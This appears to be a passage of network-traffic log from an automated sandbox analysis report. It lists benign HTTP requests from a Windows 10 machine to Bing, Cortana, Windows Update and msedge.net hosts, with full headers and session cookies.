Source: global traffic	HTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/tUCiVcVWZ-go7BLlq95YW6bKHZE.css?bu=B-IDUc4DvQJpae0D&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rb/3C/ortl,cc,nc/AptopUBu7_oVDubJxwvaIprW-lI.css?bu=A4gCjAKPAg&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Wed, 11 Aug 2010 06:19:28 GMTcookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rb/6h/cir3,ortl,cc,nc/aLwn0Je_zO1JrjbMTOSuB-i7FUM.css?bu=Me4K5wr0CucK2gvnCuAL5wrrC-cK8gvnCvgL5wr-C-cKhAznCoYL5wqMC-cKgAvnCucK0QvnCpsL5wqhC-cKlQvnCucKsAuzC-cK5wrOC7wL5wrCC8UL5wqwDOcKigznCu4M&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rb/6h/ortl,cc,nc/NajusmjIqB4kdLn9FmVxeS4xi2o.css?bu=CdoM5wrnCucK5wrnCucK5wrnCg&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ag5MNrHoG4V6seK&MD=DbLwmtSk HTTP/1.1host: slscr.update.microsoft.comaccept: /user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
Source: global traffic	HTTP traffic detected: GET /rp/1EE7kbht1gjefYNX4DWLhQUytwE.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/BaYvmXn0q_Cf4wTJN2K9KdBrfbQ.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /rp/BjLNboZeAl9CUzulz_BWYtAs2KI.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/Cj3ZU8zX_sufjrVdLFel-pJdQTs.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/Dn5Iypmm_cLV_tG2zZt_ZqSWy5o.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/DtBjRbkLzLMq5p7jmRn2HOq1lgI.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/GYWzw6Wnh2goOCGJn_s6AhjfSck.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/OUJ6ahKp8erGgr7fmZPGFt5iOeQ.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/Q0J3WqtOxBbLnp5iTXu__jsZq6o.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?87976b596980857850532fa909f51f1b HTTP/1.1host: b-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?98758aa62564c1822353726be6083611 HTTP/1.1host: b-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /rp/S-1Sin9hxjW1LkijyZiLBA_FHdk.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/TdECMV0TRBVEcANtOCAjiC_gQ1M.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/Uicjz5_Idvl9FRKtwKPHILZoadU.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?62429672578152eea57f84aafc162f64 HTTP/1.1host: spo-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /rp/XUoKWXdZQS2iuOnv0a_-gwXn0RY.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?456f89d19c3134a687f24503b7eb5933 HTTP/1.1host: spo-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
